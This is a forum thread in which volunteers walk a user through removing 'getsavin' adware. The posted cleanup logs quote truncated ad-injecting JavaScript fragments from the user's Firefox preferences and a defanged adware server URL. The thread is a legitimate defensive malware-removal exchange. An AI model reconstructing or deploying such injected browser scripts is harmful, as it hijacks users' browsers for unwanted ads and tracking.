Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

getsavin malware


  • Please log in to reply
19 replies to this topic

#1 loaf

loaf

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 23 November 2013 - 08:53 AM

so, somehow these annoying ads from getsavin pop up all the time. I'm mostly using firefox and it is not in the add/ons/extensions list. It's also not listed in control panel's add/remove programs. I've run a full scan on malwarebytes. I'm at a loss as to how to remove this. does anyone have any instructions? Thanks!


Edited by hamluis, 23 November 2013 - 09:37 AM.
Moved from XP to Am I Infected - Hamluis.


BC AdBot (Login to Remove)

 


#2 dc3

dc3

    Bleeping Treehugger


  • Members
  • 30,590 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Sierra Foothills of Northern Ca.
  • Local time:06:56 PM

Posted 23 November 2013 - 09:23 AM

Hi loaf, and welcome to Bleeping Computer.

 

Did you run the full scan with malwarebytes?

 

Please download AdwCleaner and run it.
 
An image like the one below will open, click on Scan.
 
adwcleaner11_zps48314883.png
 
Once the search is complete a list of the pending items will be displayed.  If you see any which you do not want removed, remove the check mark next to it.  
 
Click on Clean to remove the selected items.  
 
You will receive a message telling you that all programs will be close so that the infections can be removed.  Click on Ok.
 
When cleaning process is complete a log of what was removed will be presented.  Please copy and the paste this log in your next post.

Family and loved ones will always be a priority in my daily life.  You never know when one will leave you.

 

 

 

 


#3 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 23 November 2013 - 12:36 PM

thanks dc3

I did run the full scan of malwarebytes and deleted what it found.

here's the log

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\AVG Security Toolbar
Folder Deleted : C:\ProgramData\SoftSafe
Folder Deleted : C:\ProgramData\BrOwwse2Saavei
Folder Deleted : C:\Program Files\PriceGong
Folder Deleted : C:\Users\Scot\AppData\LocalLow\boost_interprocess
Folder Deleted : C:\Users\Scot\AppData\LocalLow\PriceGong
Folder Deleted : C:\Users\Scot\AppData\Roaming\Mozilla\Firefox\Profiles\7fr2t9ds.default\FCTB
Folder Deleted : C:\Users\Scot\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkekdonnbpjjplflmfaeejljoooajbfh
File Deleted : C:\Users\Scot\AppData\Local\Temp\Uninstall.exe
[x] Not Deleted : C:\Program Files\Mozilla Firefox\searchplugins\avg-secure-search.xml

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_d5615630
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BC9FD17D-30F6-4464-9E53-596A90AFF023}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Softonic
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKLM\Software\AVG Secure Search
Key Deleted : HKLM\Software\Freeze.com
Key Deleted : HKLM\Software\SProtector
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16520


-\\ Mozilla Firefox v25.0.1 (en-US)

[ File : C:\Users\Scot\AppData\Roaming\Mozilla\Firefox\Profiles\7fr2t9ds.default\prefs.js ]

Line Deleted : user_pref("aol_toolbar.default.homepage.check", false);
Line Deleted : user_pref("aol_toolbar.default.search.check", false);
Line Deleted : user_pref("browser.search.defaultthis.engineName", "Web Search");
Line Deleted : user_pref("extensions.516b3edb5280e.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}c[...]
Line Deleted : user_pref("extensions.91Cj0UstQN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i+[...]
Line Deleted : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Line Deleted : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Line Deleted : user_pref("extensions.RF1m.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement('script');script.type[...]
Line Deleted : user_pref("extensions.uk1VnnzLluY.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};(function(){if(window.self==window.top&&!document.getElementById('shk85shssm[...]
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
Line Deleted : user_pref("sweetim.toolbar.previous.keyword.URL", "");
Line Deleted : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.enable", "");

-\\ Google Chrome v

[ File : C:\Users\Scot\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [4890 octets] - [23/11/2013 12:26:45]
AdwCleaner[S0].txt - [4920 octets] - [23/11/2013 12:28:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4980 octets] ##########
 



#4 dc3

dc3

    Bleeping Treehugger


  • Members
  • 30,590 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Sierra Foothills of Northern Ca.
  • Local time:06:56 PM

Posted 23 November 2013 - 12:41 PM

Are the popups still occurring?


Family and loved ones will always be a priority in my daily life.  You never know when one will leave you.

 

 

 

 


#5 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 23 November 2013 - 12:42 PM

popups notsomuch

but there are ads on my message boards that shouldn't be there and words are underlined as to make them an ad. That's not supposed to happen either



#6 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 23 November 2013 - 12:43 PM

ads not by this site

is what the ads on the message boards have underneath them


Edited by loaf, 23 November 2013 - 12:43 PM.


#7 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 23 November 2013 - 12:46 PM

When I hover over the underlined words, the getsavin logo is there on the ad


just got a popup



#8 dc3

dc3

    Bleeping Treehugger


  • Members
  • 30,590 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Sierra Foothills of Northern Ca.
  • Local time:06:56 PM

Posted 23 November 2013 - 12:51 PM

I'm going to request that this topic be moved to the Am I Infected forum where other members who are more adept at dealing with this type of problem are available.


Family and loved ones will always be a priority in my daily life.  You never know when one will leave you.

 

 

 

 


#9 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,078 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:02:56 AM

Posted 23 November 2013 - 01:42 PM

I'm going to request that this topic be moved to the Am I Infected forum where other members who are more adept at dealing with this type of problem are available.

It is already in AII dc3, I requested it be moved a during your second post as it is a malware problem and hence belongs here :)
 
Hello loaf,
 

thisisujrt.gif Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

 

--------


I'd like us to scan your machine with ESET OnlineScan

  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

 

xXToffeeXx~


Edited by xXToffeeXx, 23 November 2013 - 01:44 PM.

~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#10 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 23 November 2013 - 05:06 PM

unkware Removal Tool (JRT) by Thisisu
Version: 6.0.8 (11.05.2013:1)
OS: Windows Vista ™ Home Basic x86
Ran by Scot on Sat 11/23/2013 at 16:57:58.57
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys



~~~ Files



~~~ Folders



~~~ FireFox

Successfully deleted: [File] C:\Users\Scot\AppData\Roaming\mozilla\firefox\profiles\7fr2t9ds.default\searchplugins\infoaxe.xml
Successfully deleted the following from C:\Users\Scot\AppData\Roaming\mozilla\firefox\profiles\7fr2t9ds.default\prefs.js

user_pref("extensions.91Cj0UstQN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-
user_pref("extensions.RF1m.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElem
user_pref("extensions.RF1m.url", "hxxp://getsrv.info/sync2/?q=hfZ9ofV9CShEAen0rjg6pchTB6lKDzt4olljtNtVh7n0rjrFrjsFrdrHrHa7tMFHhd9FrHwFrTrFqHr9qdUMDMlGojUMAe4UojgHqdn8qTaErjU5q
user_pref("extensions.uk1VnnzLluY.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};(function(){if(window.self==window.top&&!document.g
Emptied folder: C:\Users\Scot\AppData\Roaming\mozilla\firefox\profiles\7fr2t9ds.default\minidumps [131 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 11/23/2013 at 17:01:30.20
Computer was rebooted
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 



#11 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 24 November 2013 - 08:58 AM

thanks!

C:\Users\All Users\InstallMate\{248F46C0-1C04-456A-A781-5426FF6C6436}\Custom.dll    Win32/InstalleRex.L application    
C:\Users\All Users\InstallMate\{3AD39115-469E-47CC-A527-0EBCE130B3E3}\Custom.dll    Win32/InstalleRex.L application    
C:\Users\All Users\InstallMate\{B298A661-E123-4F00-ADEB-A901697B8497}\Custom.dll    Win32/InstalleRex.L application    
C:\Program Files\InboxAce_1gEI\Installr\1.bin\1gEIPlug.dll    Win32/Toolbar.MyWebSearch application    cleaned by deleting - quarantined
C:\Program Files\InboxAce_1gEI\Installr\1.bin\1gEZSETP.dll    probably a variant of Win32/Toolbar.MyWebSearch.Q application    cleaned by deleting - quarantined
C:\Program Files\InboxAce_1gEI\Installr\1.bin\NP1gEISb.dll    Win32/Toolbar.MyWebSearch application    cleaned by deleting - quarantined
C:\Program Files\Sk-Enhancer\uninstall.exe    a variant of Win32/SProtector.B application    cleaned by deleting - quarantined
C:\ProgramData\InstallMate\{248F46C0-1C04-456A-A781-5426FF6C6436}\Custom.dll    Win32/InstalleRex.L application    cleaned by deleting - quarantined
C:\ProgramData\InstallMate\{3AD39115-469E-47CC-A527-0EBCE130B3E3}\Custom.dll    Win32/InstalleRex.L application    cleaned by deleting - quarantined
C:\ProgramData\InstallMate\{B298A661-E123-4F00-ADEB-A901697B8497}\Custom.dll    Win32/InstalleRex.L application    cleaned by deleting - quarantined
C:\Users\Scot\AppData\LocalLow\InboxAce_1gEI\Installr\Cache\008F7F8D.exe    a variant of Win32/Toolbar.MyWebSearch.O application    cleaned by deleting - quarantined
C:\Users\Scot\Downloads\SoftonicDownloader_for_avancepaint.exe    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20111005105253.600_       149    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120014104749.414_       122    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120104105409.632_       120    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120217105213.275_       120    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120231105442.538_       120    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120328102837.661_        46    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120412102820.756_        46    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120412105158.945_       136    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120419104750.480_       136    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120520121259.212_        76    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120526160721.540_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120526200830.537_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120527195557.360_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120601172610.608_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120610203720.261_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120611031305.468_         6    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120615095912.891_         7    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120727065525.553_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120805121009.689_        79    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120812065505.577_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120814183345.646_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20121119121522.291_       187    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20130009201201.402_       516    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20130217152450.385_       239    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
 



#12 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,078 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:02:56 AM

Posted 24 November 2013 - 12:02 PM

Hi loaf,

 

Any difference after running these tools?

If not then try resetting firefox and tell me how it is after that.

 

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#13 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 24 November 2013 - 06:37 PM

Yes!

I am pop and ad free now.

thank you soooo! much!



#14 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,078 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:02:56 AM

Posted 26 November 2013 - 03:34 PM

Hi loaf,
 
Good to hear your problem was solved :)
How is your computer running?
 
xXToffeeXx~

Edited by xXToffeeXx, 26 November 2013 - 04:08 PM.

~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#15 loaf

loaf
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:56 PM

Posted 27 November 2013 - 05:53 PM

beautifully, thanks again!






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users